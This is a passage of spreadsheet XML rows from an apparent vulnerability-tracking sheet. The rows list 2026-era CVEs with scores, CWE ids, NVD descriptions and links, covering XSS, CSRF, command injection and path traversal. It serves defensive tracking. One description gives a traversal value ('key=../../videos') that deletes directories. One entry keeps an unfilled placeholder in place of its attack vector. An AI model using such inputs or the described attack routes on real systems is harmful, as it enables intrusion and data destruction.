      <c r="J3049" s="5" t="inlineStr"/>
      <c r="K3049" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L3049" s="5" t="inlineStr">
        <is>
          <t>The WPBot – AI ChatBot for Live Support, Lead Generation, AI Services plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'conversation' parameter in all versions up to, and including, 8.7.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The action is gated only by a nonce that is localized into every public-facing page via wp_localize_script, rendering the nonce check ineffective as an access control barrier for unauthenticated users.</t>
        </is>
      </c>
      <c r="M3049" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83593</t>
        </is>
      </c>
    </row>
    <row r="3050">
      <c r="A3050" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3050" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83595</t>
        </is>
      </c>
      <c r="C3050" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3050" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3050" s="5" t="inlineStr"/>
      <c r="F3050" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3050" s="5" t="inlineStr"/>
      <c r="H3050" s="5" t="inlineStr"/>
      <c r="I3050" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J3050" s="5" t="inlineStr"/>
      <c r="K3050" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="L3050" s="5" t="inlineStr">
        <is>
          <t>AVideo contains a cross-site request forgery vulnerability in plugin/API/set.json.php that allows attackers to perform state-changing actions by crafting GET requests that bypass CSRF protection. Attackers can navigate a victim's browser to a malicious URL with API parameters to delete videos, deactivate accounts, or modify playlists without user interaction.</t>
        </is>
      </c>
      <c r="M3050" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83595</t>
        </is>
      </c>
    </row>
    <row r="3051">
      <c r="A3051" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3051" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83625</t>
        </is>
      </c>
      <c r="C3051" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3051" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3051" s="5" t="inlineStr"/>
      <c r="F3051" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3051" s="5" t="inlineStr"/>
      <c r="H3051" s="5" t="inlineStr"/>
      <c r="I3051" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J3051" s="5" t="inlineStr"/>
      <c r="K3051" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L3051" s="5" t="inlineStr">
        <is>
          <t>The Contact Form by Supsystic plugin for WordPress is vulnerable to Stored Cross-Site Scripting via IP Address Header in all versions up to, and including, 1.10.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. An unauthenticated attacker can first call the 'updateNonce' action — which is accessible without authentication due to its absence from the plugin's permission list — to obtain a valid nonce, then submit a contact form with a malicious payload in a spoofed IP header such as X-Forwarded-For.</t>
        </is>
      </c>
      <c r="M3051" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83625</t>
        </is>
      </c>
    </row>
    <row r="3052">
      <c r="A3052" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3052" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84293</t>
        </is>
      </c>
      <c r="C3052" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3052" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3052" s="5" t="inlineStr"/>
      <c r="F3052" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3052" s="5" t="inlineStr"/>
      <c r="H3052" s="5" t="inlineStr"/>
      <c r="I3052" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3052" s="5" t="inlineStr"/>
      <c r="K3052" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L3052" s="5" t="inlineStr">
        <is>
          <t>The Repeater Fields for Gravity Forms plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Repeated Multi-Input Sub-Field Values in all versions up to, and including, 3.0.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This vulnerability only affects multi-input sub-field types within a repeater (such as Name, Address, and Checkbox fields), as scalar single-input field values are escaped with esc_html() at the output stage in version 3.0.4.</t>
        </is>
      </c>
      <c r="M3052" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84293</t>
        </is>
      </c>
    </row>
    <row r="3053">
      <c r="A3053" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3053" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84387</t>
        </is>
      </c>
      <c r="C3053" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3053" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3053" s="5" t="inlineStr"/>
      <c r="F3053" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G3053" s="5" t="inlineStr">
        <is>
          <t>fortinet</t>
        </is>
      </c>
      <c r="H3053" s="5" t="inlineStr"/>
      <c r="I3053" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3053" s="5" t="inlineStr"/>
      <c r="K3053" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="L3053" s="5" t="inlineStr">
        <is>
          <t>A improper neutralization of special elements used in a command ('command injection') vulnerability in Fortinet FortiSandbox 5.2.0, FortiSandbox 5.0.0 through 5.0.6, FortiSandbox 4.4.0 through 4.4.9 may allow attacker to execute unauthorized code or commands via &lt;insert attack vector here&gt;</t>
        </is>
      </c>
      <c r="M3053" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84387</t>
        </is>
      </c>
    </row>
    <row r="3054">
      <c r="A3054" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3054" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85160</t>
        </is>
      </c>
      <c r="C3054" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3054" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3054" s="5" t="inlineStr"/>
      <c r="F3054" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3054" s="5" t="inlineStr"/>
      <c r="H3054" s="5" t="inlineStr"/>
      <c r="I3054" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J3054" s="5" t="inlineStr"/>
      <c r="K3054" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="L3054" s="5" t="inlineStr">
        <is>
          <t>AVideo through commit c91b5975d contains a cross-site request forgery and path traversal vulnerability in stopLive.php that allows attackers to delete directories by exploiting missing token validation and unsanitized key parameter concatenation. Attackers can craft an image tag with a traversal payload like key=../../videos to trigger recursive deletion of the videos directory when an admin visits a malicious page.</t>
        </is>
      </c>
      <c r="M3054" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85160</t>
        </is>
      </c>
    </row>
    <row r="3055">
      <c r="A3055" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3055" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85165</t>
        </is>
      </c>
      <c r="C3055" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3055" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3055" s="5" t="inlineStr"/>
      <c r="F3055" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3055" s="5" t="inlineStr"/>
      <c r="H3055" s="5" t="inlineStr">
        <is>
          <t>n8n:n8n</t>
        </is>
      </c>
      <c r="I3055" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J3055" s="5" t="inlineStr"/>
      <c r="K3055" s="5" t="inlineStr">
        <is>
          <t>CWE-95</t>
        </is>
      </c>
      <c r="L3055" s="5" t="inlineStr">
        <is>
          <t>n8n versions before 2.36.2 contain an expression sandbox bypass vulnerability where free identifiers in spread, computed-key, switch-case, or class-extension positions resolve against process globals. Authenticated users with workflow-edit permission can mutate host objects through expression evaluation, with changes persisting process-wide until restart.</t>
        </is>
      </c>
      <c r="M3055" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85165</t>
        </is>
      </c>
    </row>
    <row r="3056">
      <c r="A3056" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3056" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85166</t>
        </is>
      </c>
      <c r="C3056" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3056" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3056" s="5" t="inlineStr"/>
      <c r="F3056" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3056" s="5" t="inlineStr"/>
      <c r="H3056" s="5" t="inlineStr">
        <is>
          <t>n8n:n8n</t>
        </is>
      </c>
      <c r="I3056" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J3056" s="5" t="inlineStr"/>
      <c r="K3056" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L3056" s="5" t="inlineStr">
        <is>
          <t>n8n before 2.35.4 and 2.36.x before 2.36.2 does not validate credential references in the inline workflow JSON of nodes that execute an inline sub-workflow (e.g., the Workflow Tool node). A shared-workflow editor, or any user creating/updating a workflow via the REST API, Public API, or MCP, can persist a node referencing a credential they do not own. When the workflow is later executed under an identity that holds the credential, the inline sub-workflow resolves the secret and can send it to an attacker-controlled endpoint, resulting in credential exfiltration.</t>
        </is>
      </c>
      <c r="M3056" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85166</t>
        </is>
      </c>
    </row>
    <row r="3057">
      <c r="A3057" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3057" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85213</t>
        </is>
      </c>
      <c r="C3057" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3057" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3057" s="5" t="inlineStr"/>
      <c r="F3057" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3057" s="5" t="inlineStr"/>
      <c r="H3057" s="5" t="inlineStr"/>
      <c r="I3057" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J3057" s="5" t="inlineStr"/>
      <c r="K3057" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L3057" s="5" t="inlineStr">
        <is>
          <t>Kill Bill through 0.24.21 fails to enforce permission annotations on several AdminResource endpoints including getQueueEntries, invalidatesCache, and putOutOfRotation. Authenticated users with minimal account:read permissions can read internal queues, flush server caches, and disable the server by putting the host out of rotation.</t>
        </is>
      </c>
      <c r="M3057" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85213</t>
        </is>
      </c>
    </row>
    <row r="3058">
      <c r="A3058" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3058" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85214</t>
        </is>
      </c>
      <c r="C3058" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3058" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3058" s="5" t="inlineStr"/>
      <c r="F3058" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3058" s="5" t="inlineStr"/>
      <c r="H3058" s="5" t="inlineStr"/>
      <c r="I3058" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J3058" s="5" t="inlineStr"/>
      <c r="K3058" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L3058" s="5" t="inlineStr">
        <is>
          <t>vhr fails to validate user authorization in the PUT /hr/info endpoint, allowing authenticated users to modify arbitrary HR profiles by supplying any profile ID in the request body. Attackers can overwrite other users' names, addresses, and disable accounts including administrators to cause denial of service.</t>
        </is>
      </c>
      <c r="M3058" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85214</t>
        </is>
      </c>
    </row>
    <row r="3059">
      <c r="A3059" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3059" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86541</t>
        </is>
      </c>
      <c r="C3059" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3059" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3059" s="5" t="inlineStr"/>
      <c r="F3059" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G3059" s="5" t="inlineStr"/>
      <c r="H3059" s="5" t="inlineStr"/>
      <c r="I3059" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J3059" s="5" t="inlineStr"/>
      <c r="K3059" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L3059" s="5" t="inlineStr">
        <is>
          <t>knowns versions before 0.30.0 contain a path traversal vulnerability in the handleCodeReplace() function that allows attackers to overwrite arbitrary files outside the project root. Attackers can supply absolute paths or relative paths containing directory traversal sequences to write malicious content to sensitive files like shell startup scripts or SSH configuration files.</t>
        </is>
      </c>
      <c r="M3059" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86541</t>
        </is>
      </c>
    </row>
    <row r="3060">
      <c r="A3060" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3060" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86544</t>
        </is>
      </c>
      <c r="C3060" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3060" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3060" s="5" t="inlineStr"/>
      <c r="F3060" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3060" s="5" t="inlineStr"/>
      <c r="H3060" s="5" t="inlineStr"/>
      <c r="I3060" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J3060" s="5" t="inlineStr"/>
      <c r="K3060" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L3060" s="5" t="inlineStr">
        <is>
          <t>knowns versions before 0.30.0 contain an authorization bypass vulnerability where mutating code actions are incorrectly classified as read-only operations. Attackers with read-restricted sessions can exploit code.replace to modify permission configurations and escalate privileges on subsequent calls.</t>
        </is>
      </c>
      <c r="M3060" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86544</t>
        </is>
      </c>
    </row>
    <row r="3061">
      <c r="A3061" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3061" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87021</t>
        </is>
      </c>
      <c r="C3061" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3061" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3061" s="5" t="inlineStr"/>
      <c r="F3061" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3061" s="5" t="inlineStr"/>
      <c r="H3061" s="5" t="inlineStr"/>
      <c r="I3061" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3061" s="5" t="inlineStr"/>
      <c r="K3061" s="5" t="inlineStr">
        <is>
          <t>CWE-1336</t>
        </is>
      </c>
      <c r="L3061" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed an unauthorized code execution vulnerability in Comply.</t>
        </is>
      </c>
      <c r="M3061" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87021</t>
        </is>
      </c>
    </row>
    <row r="3062">
      <c r="A3062" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3062" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88272</t>
        </is>
      </c>
      <c r="C3062" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3062" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3062" s="5" t="inlineStr"/>
      <c r="F3062" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3062" s="5" t="inlineStr"/>
      <c r="H3062" s="5" t="inlineStr"/>
      <c r="I3062" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3062" s="5" t="inlineStr"/>
      <c r="K3062" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L3062" s="5" t="inlineStr">
        <is>
          <t>GeoVision GV-LPC2211 V1.13 allows an administrator-controlled username containing shell metacharacters to be executed as arbitrary root commands when the stored username is later deleted.</t>
        </is>
      </c>
      <c r="M3062" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88272</t>
        </is>
      </c>
    </row>
    <row r="3063">
      <c r="A3063" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3063" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88273</t>
        </is>
      </c>
      <c r="C3063" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3063" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3063" s="5" t="inlineStr"/>
      <c r="F3063" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3063" s="5" t="inlineStr"/>
      <c r="H3063" s="5" t="inlineStr"/>
      <c r="I3063" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3063" s="5" t="inlineStr"/>
      <c r="K3063" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L3063" s="5" t="inlineStr">
        <is>
          <t>GeoVision GV-LPC2211 V1.13 allows an administrator-controlled PPPoE username to escape a sourced shell configuration assignment and execute arbitrary commands as root.</t>
        </is>
      </c>
      <c r="M3063" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88273</t>
        </is>
      </c>
    </row>
    <row r="3064">
      <c r="A3064" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3064" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88274</t>
        </is>
      </c>
      <c r="C3064" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3064" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3064" s="5" t="inlineStr"/>
      <c r="F3064" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3064" s="5" t="inlineStr"/>
      <c r="H3064" s="5" t="inlineStr"/>
      <c r="I3064" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3064" s="5" t="inlineStr"/>
      <c r="K3064" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L3064" s="5" t="inlineStr">
        <is>
          <t>GeoVision GV-LPC2211 V1.13 allows an administrator-controlled wireless SSID containing shell syntax to execute arbitrary commands as root.</t>
        </is>
      </c>
      <c r="M3064" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88274</t>
        </is>
      </c>
    </row>
    <row r="3065">
      <c r="A3065" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3065" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88275</t>
        </is>
      </c>
      <c r="C3065" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3065" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3065" s="5" t="inlineStr"/>
      <c r="F3065" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3065" s="5" t="inlineStr"/>
      <c r="H3065" s="5" t="inlineStr"/>
      <c r="I3065" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3065" s="5" t="inlineStr"/>
      <c r="K3065" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L3065" s="5" t="inlineStr">
        <is>
          <t>GeoVision GV-LPC2211 V1.13 allows an administrator-controlled WPA-PSK containing shell syntax to execute arbitrary commands as root when wireless configuration is applied.</t>
        </is>
      </c>
      <c r="M3065" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88275</t>
        </is>
      </c>
    </row>
    <row r="3066">
      <c r="A3066" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3066" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88276</t>
        </is>
      </c>
      <c r="C3066" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3066" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3066" s="5" t="inlineStr"/>
      <c r="F3066" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3066" s="5" t="inlineStr"/>
      <c r="H3066" s="5" t="inlineStr"/>
      <c r="I3066" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3066" s="5" t="inlineStr"/>
      <c r="K3066" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L3066" s="5" t="inlineStr">
        <is>
          <t>GeoVision GV-LPC2211 V1.13 allows administrator-controlled WEP key values containing shell syntax to execute arbitrary commands as root.</t>
        </is>
      </c>
      <c r="M3066" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88276</t>
        </is>
      </c>
    </row>
    <row r="3067">
      <c r="A3067" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3067" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88282</t>
        </is>
      </c>
      <c r="C3067" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3067" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3067" s="5" t="inlineStr"/>
      <c r="F3067" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3067" s="5" t="inlineStr"/>
      <c r="H3067" s="5" t="inlineStr"/>
      <c r="I3067" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3067" s="5" t="inlineStr"/>
      <c r="K3067" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L3067" s="5" t="inlineStr">
        <is>
          <t>GeoVision GV-LPC2211 V1.13 allows an administrator-controlled FTP username containing shell metacharacters to be executed as arbitrary root commands during a subsequent FTP-account update.</t>
        </is>
      </c>
      <c r="M3067" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88282</t>
        </is>
      </c>
    </row>
    <row r="3068">
      <c r="A3068" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3068" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88891</t>
        </is>
      </c>
      <c r="C3068" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="D3068" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3068" s="5" t="inlineStr"/>
      <c r="F3068" s="5" t="inlineStr"/>
      <c r="G3068" s="5" t="inlineStr"/>
      <c r="H3068" s="5" t="inlineStr"/>
      <c r="I3068" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3068" s="5" t="inlineStr"/>
      <c r="K3068" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L3068" s="5" t="inlineStr">
        <is>
          <t>OpenPanel fails to enforce read-only project access level on 26 of 29 mutating procedures, allowing read-level members to modify, delete, and publish project data. Attackers with explicit read-only access can delete reports and dashboards, schedule entire projects for deletion, publish private analytics to public share links, and modify alerting rules by exploiting missing access level validation in mutation resolvers.</t>
        </is>
      </c>
      <c r="M3068" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88891</t>
        </is>
      </c>
    </row>
    <row r="3069">
      <c r="A3069" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3069" s="5" t="inlineStr">
        <is>
          <t>CVE-2020-37277</t>
        </is>
      </c>
      <c r="C3069" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3069" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3069" s="5" t="inlineStr"/>
      <c r="F3069" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3069" s="5" t="inlineStr"/>
      <c r="H3069" s="5" t="inlineStr"/>
      <c r="I3069" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J3069" s="5" t="inlineStr"/>
      <c r="K3069" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L3069" s="5" t="inlineStr">
        <is>
          <t>PocketMine-MP versions before 3.15.4 contain a denial of service vulnerability in the InventoryTransaction component's findResultItem() method. Malicious clients can send specially crafted InventoryTransactionPackets with multiple conflicting pathways to cause exponential processing complexity, freezing the server.</t>
        </is>
      </c>
      <c r="M3069" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2020-37277</t>
        </is>
      </c>
    </row>
    <row r="3070">
      <c r="A3070" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3070" s="5" t="inlineStr">
        <is>
          <t>CVE-2021-48007</t>
        </is>
      </c>
      <c r="C3070" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3070" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3070" s="5" t="inlineStr"/>
      <c r="F3070" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3070" s="5" t="inlineStr"/>
      <c r="H3070" s="5" t="inlineStr"/>
      <c r="I3070" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J3070" s="5" t="inlineStr"/>
      <c r="K3070" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L3070" s="5" t="inlineStr">
        <is>
          <t>PocketMine-MP versions before 3.18.1 fail to validate NaN or INF values in MovePlayerPacket position and rotation fields. Malicious clients can send crafted movement packets with invalid floating-point values to crash servers through unhandled mathematical operations or prevent clients from rendering other players.</t>
        </is>
      </c>
      <c r="M3070" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2021-48007</t>
        </is>
      </c>
    </row>
    <row r="3071">
      <c r="A3071" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3071" s="5" t="inlineStr">
        <is>
          <t>CVE-2022-35499</t>
        </is>
      </c>
      <c r="C3071" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3071" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3071" s="5" t="inlineStr"/>
      <c r="F3071" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3071" s="5" t="inlineStr"/>
      <c r="H3071" s="5" t="inlineStr"/>
      <c r="I3071" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3071" s="5" t="inlineStr"/>
      <c r="K3071" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L3071" s="5" t="inlineStr">
        <is>
          <t>In Trimble TM4WEB 21.4.0.4, the external bill viewer endpoint is vulnerable to reflected cross-site scripting via injection in a arbitrary parameter appended to the URL.</t>
        </is>
      </c>
      <c r="M3071" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2022-35499</t>
        </is>
      </c>
    </row>
    <row r="3072">
      <c r="A3072" s="5" t="inlineStr">
        <is>
